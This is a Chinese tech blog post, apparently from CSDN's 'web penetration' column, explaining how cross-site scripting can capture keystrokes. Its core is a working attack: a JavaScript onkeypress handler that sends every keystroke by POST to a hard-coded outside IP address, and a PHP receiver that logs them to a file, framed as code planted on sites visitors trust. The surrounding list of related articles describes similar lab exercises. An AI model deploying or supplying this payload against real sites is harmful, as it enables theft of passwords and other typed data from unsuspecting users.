XSS获取键盘原理

最新推荐文章于 2024-06-27 10:15:39 发布
最新推荐文章于 2024-06-27 10:15:39 发布
阅读量644 收藏 2
点赞数
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Destiny_one/article/details/119532565
版权

涉及的js知识:
onkeypress 事件会在键盘按键被按下并释放一个键时发生
fromCharCode() 可接受一个指定的 Unicode 值,然后返回一个字符串。
charCode 事件属性 事件对象 实例 获取按下的键盘按键Unicode值
XMLHttpRequest 对象能够:
在不重新加载页面的情况下更新网页
在页面已加载后从服务器请求数据
在页面已加载后从服务器接收数据
在后台向服务器发送数据
encodeURI(key)对URI 进行完整的编码
http.open第三个参数设置请求是否为异步模式。如果是TRUE,JavaScript函数将继续执行,而不等待服务器响应

远程攻击代码:document.onkeypress = function(evt) {
evt = evt || window.event
key = String.fromCharCode(evt.charCode)
if (key) {
var http = new XMLHttpRequest();
var param = encodeURI(key)
http.open(“POST”,“http://1.117.107.31/getcookie.php”,true);
http.setRequestHeader(“Content-type”,“application/x-www-form-urlencoded”);
http.send(“key=”+param);
}
}

接收代码:

<?php $key = $_POST['key']; $log = fopen("keylog.txt","a"); fwrite($log,$key); fclose($log); ?>

引用

总结:原理主要是通过受害者访问已经被插入xss代码的网站,触发js脚本,记录受害者在当前网站的键盘操作,传输到我们接收的网站

鸣蜩十四
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS跨站脚本攻击:获取键盘记录
jklbnm12的博客
01-20 718
将进行下图3个实验,更好的来理解xss的危害和原理 先去修改下Pikachu靶机中的,cookie.php修改成自己的ip 实验1:xss如何获取cookie? 只需要将  Pikachu靶机中的pkxss文件复制到攻击机中的站点(www)下即可。 登入下      默认没任何数据 1.1 GETXSS利用:cookie获取 先将字符长度的限制给修改掉 pkxss后台: http://192.168.43.117/pkxss/pkxss_login.php 现在是没
XSS获取键盘记录练习
weixin_44720762的博客
05-03 1117
在开始本篇博客之前,我想先声明,本人初涉安全领域知识,此博客用于记录日常渗透练习心得,并不提倡用着专业指导知识,请选择性阅读。 因为相关知识的练习性,先对部分名词含义进行说明。 跨域: URL(统一资源定位符)中有 协议,子域名,主域名,端口,资源地址。在任意两个URL中这几个部分中任意部分纯在不同就是跨域操作。我们把任意两个域间进行的资源访问操作称为跨域操作。 同源策略:同源策略(Same or...
【网络安全渗透测试零基础入门必知必会】之XSS攻击获取键盘记录(实战演示)零基础入门到精通收藏这一篇就够了(3)
最新发布
Libra1313的博客
06-27 910
此处xss漏洞主要利用src属性的跨站访问,使得被攻击者可以通过src属性自动跳转到攻击者的xss平台,祝各位学习顺利!为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取[2024最新CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享]因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
XSS跨站脚本攻击之——XSS获取键盘记录
温柔小薛的博客
04-05 475
XSS获取键盘记录 条件比较苛刻 除非对方网站管理员配置了跨域访问否则无法实现 理论 什么是跨域 http:// www. oldboyedu.com :80 / news/index.php 协议 :// 子域名 . 主域名 : 端口 / 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域。我们把不同的域之间请...
3-8案例演示-xss获取键盘记录实验演示
山兔的博客
04-26 1028
在实验前,先了解一下什么是跨域 因为在这个实验里面,我们会去远程的调用js文件,远程调用js会涉及到跨域请求的问题 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名、子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作 跨域-同源策略 而为了安全考虑,所有的浏览器都约定了“同源策略”,(同源策略是在浏览器端去执行的)同源策略规定,两个不同
XSS漏洞利用——键盘记录
cxrpty的博客
02-21 1373
实验环境:DVWA 实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器 实验步骤: 一、在服务器创建一个keylog.php文件获取键盘记录,并将记录写入key.txt中。 php代码如下: <?php $file=fopen("key.txt","a"); if(isset($_REQUEST['key']...
XSS搭建教程以及源码
05-05
- 监听键盘输入,获取用户密码和其他敏感信息。 - 在用户浏览器上安装恶意扩展或脚本。 三、XSS防护策略 防止XSS攻击的方法主要包括: 1. 输入验证:对用户提交的数据进行严格的过滤和转义,避免执行代码。 2. ...
网页虚拟键盘
08-12
3. **安全性**:确保键盘输入不被第三方截取,可采用HTTPS加密传输、防止XSS攻击等手段。 4. **自定义功能**:允许用户根据需求调整键盘设置,比如切换大小写、开启数字锁定等。 5. **兼容性**:考虑到不同的...
spring+html5实现安全传输随机数字密码键盘
08-30
4. **页面展示**:前端页面通过JavaScript循环请求服务器,获取每个数字对应的图片流,并显示在数字键盘上。用户点击数字图片时,对应的密文会被添加到一个隐藏的`pkey`输入框中,多个数字用逗号分隔。 5. **密码...
js软键盘.js软键盘.js软键盘
06-26
4. **安全性考虑**:确保软键盘在处理敏感信息时能提供足够的安全防护,比如防止XSS攻击,避免键盘事件的劫持等。 5. **响应式设计**:为了适应不同设备和屏幕尺寸,软键盘需要有良好的响应式设计,保证在任何设备...
Go-XSShell是一个XSS反向shell框架
08-14
3. **交互过程**:攻击者可以通过此通道执行各种JavaScript命令,如读取DOM、获取cookie、操纵页面内容、捕获键盘输入等。这些操作提供了对受害者浏览器环境的广泛控制。 **三、Go语言在安全领域的应用** Go语言以...
pikachu漏洞靶机之xss获取键盘记录
weixin_43803070的博客
06-01 1413
在实验前,先了解一下什么是跨域 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作。 跨域-同源策略 而为了安全考虑,所有的浏览器都约定...
xss获取键盘记录实验演示
qq_42764906的博客
04-23 260
在实验开始之前我们需要了解几个概念 在此之前把如图的位置改为自己pkxss的网址 检查如图的代码是否有 或者有没有没注释掉 在存储xss输入 之后在键盘上敲aaaaaa 得到 如图 ...
pikachu之xss获取键盘记录
2301_80661529的博客
02-28 685
此处xss漏洞主要利用src属性的跨站访问,使得被攻击者可以通过src属性自动跳转到攻击者的xss平台,祝各位学习顺利!
反射XSS,存储XSS,DomXSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
weixin_43858799的博客
04-22 3013
XSS: 反射XSS,存储XSS,DomXSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一、跨站脚本漏洞(XSSXSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发生在web前端的漏洞,主要危害前端用户 XSS可以通过进行钓鱼攻击,前端js挖矿,用户cookie获取,甚至结合浏览器自身漏洞对主机进行远程控制等 攻击流程图: 危害:存储>反射>D...
风炫安全WEB安全学习第二十五节课 利用XSS键盘记录
风炫的博客
01-05 146
风炫安全WEB安全学习第二十五节课 利用XSS键盘记录 XSS键盘记录 同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。所以xyz.com下的js脚本采用ajax读取abc.com里面的文件数据是会被拒绝的。 同源策略限制了从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互。这是一个用于隔离潜在恶意文件的重要安全机制。 注意,资源文件不受影响: <script src="..."> <img src="..."> <
xss盗取键盘记录实例
whoim_i的博客
11-06 1106
本实验以反射xss漏洞为例 实验环境:kali 192.168.133.131 dvwa靶机 192.168.133.128 1、首先看起kali上的apache服务,命令: /etc/init.d/apache2 start 2、在kali的浏览器输入:http://192.168.133.131 或 http://localhost 地址进行访问测试,检查apache是否开启成功 3、 ...
xss攻击:记录用户按键实验
weixin_43726152的博客
05-12 435
目标主机:win10 192.168.56.133 攻击主机:win10 192.168.56.132 0x0:在有xss漏洞的的网页上写下 <script src="http://192.168.56.132/pika/pkxss/rkeypress/rk.js"></script> 0x1获取用户的按键,发送到攻击者的后台 主要功能就是获取用户的按键:String.fromCharCode(event.keyCode); 然后再异步发送到攻击者的后台http://192.168
xss获取cookies
06-14
XSS攻击中,攻击者通常通过以下几个步骤尝试获取cookies: 1. **注入恶意脚本**:攻击者通过构造恶意URL或者输入字段,将一段包含JavaScript代码的字符串插入到用户的浏览器中,比如在HTML的`<script>`标签、`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值